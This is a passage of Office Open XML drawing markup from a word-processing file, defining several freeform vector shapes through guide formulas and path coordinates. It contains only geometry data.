                              <a:gd name="T3" fmla="*/ 39 h 214"/>
                              <a:gd name="T4" fmla="*/ 115 w 214"/>
                              <a:gd name="T5" fmla="*/ 0 h 214"/>
                              <a:gd name="T6" fmla="*/ 66 w 214"/>
                              <a:gd name="T7" fmla="*/ 0 h 214"/>
                              <a:gd name="T8" fmla="*/ 16 w 214"/>
                              <a:gd name="T9" fmla="*/ 39 h 214"/>
                              <a:gd name="T10" fmla="*/ 0 w 214"/>
                              <a:gd name="T11" fmla="*/ 77 h 214"/>
                              <a:gd name="T12" fmla="*/ 0 w 214"/>
                              <a:gd name="T13" fmla="*/ 97 h 214"/>
                              <a:gd name="T14" fmla="*/ 8 w 214"/>
                              <a:gd name="T15" fmla="*/ 97 h 214"/>
                              <a:gd name="T16" fmla="*/ 33 w 214"/>
                              <a:gd name="T17" fmla="*/ 97 h 214"/>
                              <a:gd name="T18" fmla="*/ 107 w 214"/>
                              <a:gd name="T19" fmla="*/ 116 h 214"/>
                              <a:gd name="T20" fmla="*/ 140 w 214"/>
                              <a:gd name="T21" fmla="*/ 136 h 214"/>
                              <a:gd name="T22" fmla="*/ 173 w 214"/>
                              <a:gd name="T23" fmla="*/ 194 h 214"/>
                              <a:gd name="T24" fmla="*/ 189 w 214"/>
                              <a:gd name="T25" fmla="*/ 214 h 214"/>
                              <a:gd name="T26" fmla="*/ 206 w 214"/>
                              <a:gd name="T27" fmla="*/ 194 h 214"/>
                              <a:gd name="T28" fmla="*/ 214 w 214"/>
                              <a:gd name="T29" fmla="*/ 155 h 214"/>
                              <a:gd name="T30" fmla="*/ 20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97"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="165" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20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47027049" name="Freeform 44"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6974" y="6284"/>
                            <a:ext cx="29" cy="16"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 156 w 173"/>
                              <a:gd name="T1" fmla="*/ 59 h 98"/>
                              <a:gd name="T2" fmla="*/ 124 w 173"/>
                              <a:gd name="T3" fmla="*/ 59 h 98"/>
                              <a:gd name="T4" fmla="*/ 91 w 173"/>
                              <a:gd name="T5" fmla="*/ 20 h 98"/>
                              <a:gd name="T6" fmla="*/ 74 w 173"/>
                              <a:gd name="T7" fmla="*/ 0 h 98"/>
                              <a:gd name="T8" fmla="*/ 58 w 173"/>
                              <a:gd name="T9" fmla="*/ 0 h 98"/>
                              <a:gd name="T10" fmla="*/ 0 w 173"/>
                              <a:gd name="T11" fmla="*/ 78 h 98"/>
                              <a:gd name="T12" fmla="*/ 0 w 173"/>
                              <a:gd name="T13" fmla="*/ 78 h 98"/>
                              <a:gd name="T14" fmla="*/ 8 w 173"/>
                              <a:gd name="T15" fmla="*/ 98 h 98"/>
                              <a:gd name="T16" fmla="*/ 66 w 173"/>
                              <a:gd name="T17" fmla="*/ 59 h 98"/>
                              <a:gd name="T18" fmla="*/ 82 w 173"/>
                              <a:gd name="T19" fmla="*/ 59 h 98"/>
                              <a:gd name="T20" fmla="*/ 115 w 173"/>
                              <a:gd name="T21" fmla="*/ 98 h 98"/>
                              <a:gd name="T22" fmla="*/ 156 w 173"/>
                              <a:gd name="T23" fmla="*/ 78 h 98"/>
                              <a:gd name="T24" fmla="*/ 165 w 173"/>
                              <a:gd name="T25" fmla="*/ 59 h 98"/>
                              <a:gd name="T26" fmla="*/ 173 w 173"/>
                              <a:gd name="T27" fmla="*/ 59 h 98"/>
                              <a:gd name="T28" fmla="*/ 156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59"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="124" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156"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225046926" name="Freeform 45"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6957" y="6297"/>
                            <a:ext cx="44" cy="107"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 264 w 264"/>
                              <a:gd name="T1" fmla="*/ 20 h 642"/>
                              <a:gd name="T2" fmla="*/ 255 w 264"/>
                              <a:gd name="T3" fmla="*/ 59 h 642"/>
                              <a:gd name="T4" fmla="*/ 223 w 264"/>
                              <a:gd name="T5" fmla="*/ 136 h 642"/>
                              <a:gd name="T6" fmla="*/ 140 w 264"/>
                              <a:gd name="T7" fmla="*/ 331 h 642"/>
                              <a:gd name="T8" fmla="*/ 50 w 264"/>
                              <a:gd name="T9" fmla="*/ 526 h 642"/>
                              <a:gd name="T10" fmla="*/ 17 w 264"/>
                              <a:gd name="T11" fmla="*/ 603 h 642"/>
                              <a:gd name="T12" fmla="*/ 0 w 264"/>
                              <a:gd name="T13" fmla="*/ 642 h 642"/>
                              <a:gd name="T14" fmla="*/ 0 w 264"/>
                              <a:gd name="T15" fmla="*/ 623 h 642"/>
                              <a:gd name="T16" fmla="*/ 0 w 264"/>
                              <a:gd name="T17" fmla="*/ 584 h 642"/>
                              <a:gd name="T18" fmla="*/ 17 w 264"/>
                              <a:gd name="T19" fmla="*/ 409 h 642"/>
                              <a:gd name="T20" fmla="*/ 17 w 264"/>
                              <a:gd name="T21" fmla="*/ 331 h 642"/>
                              <a:gd name="T22" fmla="*/ 9 w 264"/>
                              <a:gd name="T23" fmla="*/ 273 h 642"/>
                              <a:gd name="T24" fmla="*/ 9 w 264"/>
                              <a:gd name="T25" fmla="*/ 253 h 642"/>
                              <a:gd name="T26" fmla="*/ 17 w 264"/>
                              <a:gd name="T27" fmla="*/ 253 h 642"/>
                              <a:gd name="T28" fmla="*/ 66 w 264"/>
                              <a:gd name="T29" fmla="*/ 234 h 642"/>
                              <a:gd name="T30" fmla="*/ 132 w 264"/>
                              <a:gd name="T31" fmla="*/ 175 h 642"/>
                              <a:gd name="T32" fmla="*/ 198 w 264"/>
                              <a:gd name="T33" fmla="*/ 98 h 642"/>
                              <a:gd name="T34" fmla="*/ 239 w 264"/>
                              <a:gd name="T35" fmla="*/ 20 h 642"/>
                              <a:gd name="T36" fmla="*/ 264 w 264"/>
                              <a:gd name="T37" fmla="*/ 0 h 642"/>
                              <a:gd name="T38" fmla="*/ 264 w 264"/>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20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="255" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="198" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="264" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="264"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04827256" name="Freeform 46"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6953" y="6349"/>
                            <a:ext cx="7" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 25 w 41"/>
                              <a:gd name="T1" fmla="*/ 428 h 447"/>
                              <a:gd name="T2" fmla="*/ 41 w 41"/>
                              <a:gd name="T3" fmla="*/ 350 h 447"/>
                              <a:gd name="T4" fmla="*/ 41 w 41"/>
                              <a:gd name="T5" fmla="*/ 311 h 447"/>
                              <a:gd name="T6" fmla="*/ 33 w 41"/>
                              <a:gd name="T7" fmla="*/ 272 h 447"/>
                              <a:gd name="T8" fmla="*/ 25 w 41"/>
                              <a:gd name="T9" fmla="*/ 175 h 447"/>
                              <a:gd name="T10" fmla="*/ 33 w 41"/>
                              <a:gd name="T11" fmla="*/ 58 h 447"/>
                              <a:gd name="T12" fmla="*/ 33 w 41"/>
                              <a:gd name="T13" fmla="*/ 19 h 447"/>
                              <a:gd name="T14" fmla="*/ 33 w 41"/>
                              <a:gd name="T15" fmla="*/ 0 h 447"/>
                              <a:gd name="T16" fmla="*/ 25 w 41"/>
                              <a:gd name="T17" fmla="*/ 0 h 447"/>
                              <a:gd name="T18" fmla="*/ 17 w 41"/>
                              <a:gd name="T19" fmla="*/ 19 h 447"/>
                              <a:gd name="T20" fmla="*/ 0 w 41"/>
                              <a:gd name="T21" fmla="*/ 116 h 447"/>
                              <a:gd name="T22" fmla="*/ 0 w 41"/>
                              <a:gd name="T23" fmla="*/ 233 h 447"/>
                              <a:gd name="T24" fmla="*/ 0 w 41"/>
                              <a:gd name="T25" fmla="*/ 350 h 447"/>
                              <a:gd name="T26" fmla="*/ 17 w 41"/>
                              <a:gd name="T27" fmla="*/ 447 h 447"/>
                              <a:gd name="T28" fmla="*/ 25 w 41"/>
                              <a:gd name="T29" fmla="*/ 447 h 447"/>
                              <a:gd name="T30" fmla="*/ 25 w 41"/>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47">
                                <a:moveTo>
                                  <a:pt x="25" y="428"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="41" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25"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02962222" name="Freeform 47"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6893" y="6245"/>
                            <a:ext cx="40" cy="33"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 238"/>
                              <a:gd name="T1" fmla="*/ 175 h 194"/>
                              <a:gd name="T2" fmla="*/ 49 w 238"/>
                              <a:gd name="T3" fmla="*/ 97 h 194"/>
                              <a:gd name="T4" fmla="*/ 115 w 238"/>
                              <a:gd name="T5" fmla="*/ 19 h 194"/>
                              <a:gd name="T6" fmla="*/ 181 w 238"/>
                              <a:gd name="T7" fmla="*/ 0 h 194"/>
                              <a:gd name="T8" fmla="*/ 206 w 238"/>
                              <a:gd name="T9" fmla="*/ 0 h 194"/>
                              <a:gd name="T10" fmla="*/ 230 w 238"/>
                              <a:gd name="T11" fmla="*/ 39 h 194"/>
                              <a:gd name="T12" fmla="*/ 238 w 238"/>
                              <a:gd name="T13" fmla="*/ 78 h 194"/>
                              <a:gd name="T14" fmla="*/ 230 w 238"/>
                              <a:gd name="T15" fmla="*/ 117 h 194"/>
                              <a:gd name="T16" fmla="*/ 222 w 238"/>
                              <a:gd name="T17" fmla="*/ 136 h 194"/>
                              <a:gd name="T18" fmla="*/ 214 w 238"/>
                              <a:gd name="T19" fmla="*/ 117 h 194"/>
                              <a:gd name="T20" fmla="*/ 164 w 238"/>
                              <a:gd name="T21" fmla="*/ 78 h 194"/>
                              <a:gd name="T22" fmla="*/ 107 w 238"/>
                              <a:gd name="T23" fmla="*/ 97 h 194"/>
                              <a:gd name="T24" fmla="*/ 49 w 238"/>
                              <a:gd name="T25" fmla="*/ 136 h 194"/>
                              <a:gd name="T26" fmla="*/ 8 w 238"/>
                              <a:gd name="T27" fmla="*/ 194 h 194"/>
                              <a:gd name="T28" fmla="*/ 0 w 238"/>
                              <a:gd name="T29" fmla="*/ 194 h 194"/>
                              <a:gd name="T30" fmla="*/ 0 w 238"/>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194">
                                <a:moveTo>
                                  <a:pt x="0" y="175"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="49" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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71332000" name="Freeform 48"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6883" y="6294"/>
                            <a:ext cx="14" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 82"/>
                              <a:gd name="T1" fmla="*/ 0 h 447"/>
                              <a:gd name="T2" fmla="*/ 24 w 82"/>
                              <a:gd name="T3" fmla="*/ 0 h 447"/>
                              <a:gd name="T4" fmla="*/ 57 w 82"/>
                              <a:gd name="T5" fmla="*/ 58 h 447"/>
                              <a:gd name="T6" fmla="*/ 74 w 82"/>
                              <a:gd name="T7" fmla="*/ 117 h 447"/>
                              <a:gd name="T8" fmla="*/ 82 w 82"/>
                              <a:gd name="T9" fmla="*/ 214 h 447"/>
                              <a:gd name="T10" fmla="*/ 74 w 82"/>
                              <a:gd name="T11" fmla="*/ 311 h 447"/>
                              <a:gd name="T12" fmla="*/ 41 w 82"/>
                              <a:gd name="T13" fmla="*/ 428 h 447"/>
                              <a:gd name="T14" fmla="*/ 24 w 82"/>
                              <a:gd name="T15" fmla="*/ 447 h 447"/>
                              <a:gd name="T16" fmla="*/ 16 w 82"/>
                              <a:gd name="T17" fmla="*/ 447 h 447"/>
                              <a:gd name="T18" fmla="*/ 16 w 82"/>
                              <a:gd name="T19" fmla="*/ 428 h 447"/>
                              <a:gd name="T20" fmla="*/ 24 w 82"/>
                              <a:gd name="T21" fmla="*/ 389 h 447"/>
                              <a:gd name="T22" fmla="*/ 33 w 82"/>
                              <a:gd name="T23" fmla="*/ 311 h 447"/>
                              <a:gd name="T24" fmla="*/ 33 w 82"/>
                              <a:gd name="T25" fmla="*/ 253 h 447"/>
                              <a:gd name="T26" fmla="*/ 16 w 82"/>
                              <a:gd name="T27" fmla="*/ 155 h 447"/>
                              <a:gd name="T28" fmla="*/ 0 w 82"/>
                              <a:gd name="T29" fmla="*/ 78 h 447"/>
                              <a:gd name="T30" fmla="*/ 8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 y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="24" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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234969445" name="Freeform 49"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5616" y="4059"/>
                            <a:ext cx="1330" cy="133"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 156 w 7973"/>
                              <a:gd name="T1" fmla="*/ 136 h 798"/>
                              <a:gd name="T2" fmla="*/ 57 w 7973"/>
                              <a:gd name="T3" fmla="*/ 311 h 798"/>
                              <a:gd name="T4" fmla="*/ 49 w 7973"/>
                              <a:gd name="T5" fmla="*/ 545 h 798"/>
                              <a:gd name="T6" fmla="*/ 106 w 7973"/>
                              <a:gd name="T7" fmla="*/ 681 h 798"/>
                              <a:gd name="T8" fmla="*/ 181 w 7973"/>
                              <a:gd name="T9" fmla="*/ 700 h 798"/>
                              <a:gd name="T10" fmla="*/ 238 w 7973"/>
                              <a:gd name="T11" fmla="*/ 603 h 798"/>
                              <a:gd name="T12" fmla="*/ 230 w 7973"/>
                              <a:gd name="T13" fmla="*/ 389 h 798"/>
                              <a:gd name="T14" fmla="*/ 156 w 7973"/>
                              <a:gd name="T15" fmla="*/ 350 h 798"/>
                              <a:gd name="T16" fmla="*/ 139 w 7973"/>
                              <a:gd name="T17" fmla="*/ 428 h 798"/>
                              <a:gd name="T18" fmla="*/ 172 w 7973"/>
                              <a:gd name="T19" fmla="*/ 506 h 798"/>
                              <a:gd name="T20" fmla="*/ 197 w 7973"/>
                              <a:gd name="T21" fmla="*/ 448 h 798"/>
                              <a:gd name="T22" fmla="*/ 189 w 7973"/>
                              <a:gd name="T23" fmla="*/ 564 h 798"/>
                              <a:gd name="T24" fmla="*/ 139 w 7973"/>
                              <a:gd name="T25" fmla="*/ 584 h 798"/>
                              <a:gd name="T26" fmla="*/ 106 w 7973"/>
                              <a:gd name="T27" fmla="*/ 506 h 798"/>
                              <a:gd name="T28" fmla="*/ 106 w 7973"/>
                              <a:gd name="T29" fmla="*/ 350 h 798"/>
                              <a:gd name="T30" fmla="*/ 156 w 7973"/>
                              <a:gd name="T31" fmla="*/ 253 h 798"/>
                              <a:gd name="T32" fmla="*/ 230 w 7973"/>
                              <a:gd name="T33" fmla="*/ 272 h 798"/>
                              <a:gd name="T34" fmla="*/ 279 w 7973"/>
                              <a:gd name="T35" fmla="*/ 409 h 798"/>
                              <a:gd name="T36" fmla="*/ 279 w 7973"/>
                              <a:gd name="T37" fmla="*/ 623 h 798"/>
                              <a:gd name="T38" fmla="*/ 213 w 7973"/>
                              <a:gd name="T39" fmla="*/ 778 h 798"/>
                              <a:gd name="T40" fmla="*/ 98 w 7973"/>
                              <a:gd name="T41" fmla="*/ 778 h 798"/>
                              <a:gd name="T42" fmla="*/ 8 w 7973"/>
                              <a:gd name="T43" fmla="*/ 545 h 798"/>
                              <a:gd name="T44" fmla="*/ 16 w 7973"/>
                              <a:gd name="T45" fmla="*/ 253 h 798"/>
                              <a:gd name="T46" fmla="*/ 139 w 7973"/>
                              <a:gd name="T47" fmla="*/ 39 h 798"/>
                              <a:gd name="T48" fmla="*/ 255 w 7973"/>
                              <a:gd name="T49" fmla="*/ 0 h 798"/>
                              <a:gd name="T50" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T51" fmla="*/ 19 h 798"/>
                              <a:gd name="T52" fmla="*/ 7916 w 7973"/>
                              <a:gd name="T53" fmla="*/ 136 h 798"/>
                              <a:gd name="T54" fmla="*/ 7973 w 7973"/>
                              <a:gd name="T55" fmla="*/ 409 h 798"/>
                              <a:gd name="T56" fmla="*/ 7932 w 7973"/>
                              <a:gd name="T57" fmla="*/ 681 h 798"/>
                              <a:gd name="T58" fmla="*/ 7809 w 7973"/>
                              <a:gd name="T59" fmla="*/ 798 h 798"/>
                              <a:gd name="T60" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T61" fmla="*/ 720 h 798"/>
                              <a:gd name="T62" fmla="*/ 7685 w 7973"/>
                              <a:gd name="T63" fmla="*/ 506 h 798"/>
                              <a:gd name="T64" fmla="*/ 7718 w 7973"/>
                              <a:gd name="T65" fmla="*/ 331 h 798"/>
                              <a:gd name="T66" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T67" fmla="*/ 253 h 798"/>
                              <a:gd name="T68" fmla="*/ 7850 w 7973"/>
                              <a:gd name="T69" fmla="*/ 292 h 798"/>
                              <a:gd name="T70" fmla="*/ 7875 w 7973"/>
                              <a:gd name="T71" fmla="*/ 428 h 798"/>
                              <a:gd name="T72" fmla="*/ 7858 w 7973"/>
                              <a:gd name="T73" fmla="*/ 564 h 798"/>
                              <a:gd name="T74" fmla="*/ 7817 w 7973"/>
                              <a:gd name="T75" fmla="*/ 603 h 798"/>
                              <a:gd name="T76" fmla="*/ 7768 w 7973"/>
                              <a:gd name="T77" fmla="*/ 486 h 798"/>
                              <a:gd name="T78" fmla="*/ 7792 w 7973"/>
                              <a:gd name="T79" fmla="*/ 467 h 798"/>
                              <a:gd name="T80" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T81" fmla="*/ 467 h 798"/>
                              <a:gd name="T82" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T83" fmla="*/ 389 h 798"/>
                              <a:gd name="T84" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T85" fmla="*/ 331 h 798"/>
                              <a:gd name="T86" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T87" fmla="*/ 506 h 798"/>
                              <a:gd name="T88" fmla="*/ 7759 w 7973"/>
                              <a:gd name="T89" fmla="*/ 662 h 798"/>
                              <a:gd name="T90" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T91" fmla="*/ 700 h 798"/>
                              <a:gd name="T92" fmla="*/ 7899 w 7973"/>
                              <a:gd name="T93" fmla="*/ 623 h 798"/>
                              <a:gd name="T94" fmla="*/ 7932 w 7973"/>
                              <a:gd name="T95" fmla="*/ 428 h 798"/>
                              <a:gd name="T96" fmla="*/ 7883 w 7973"/>
                              <a:gd name="T97" fmla="*/ 195 h 798"/>
                              <a:gd name="T98" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T99" fmla="*/ 11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117"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="156" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="798"/>
                                </a:lnTo>
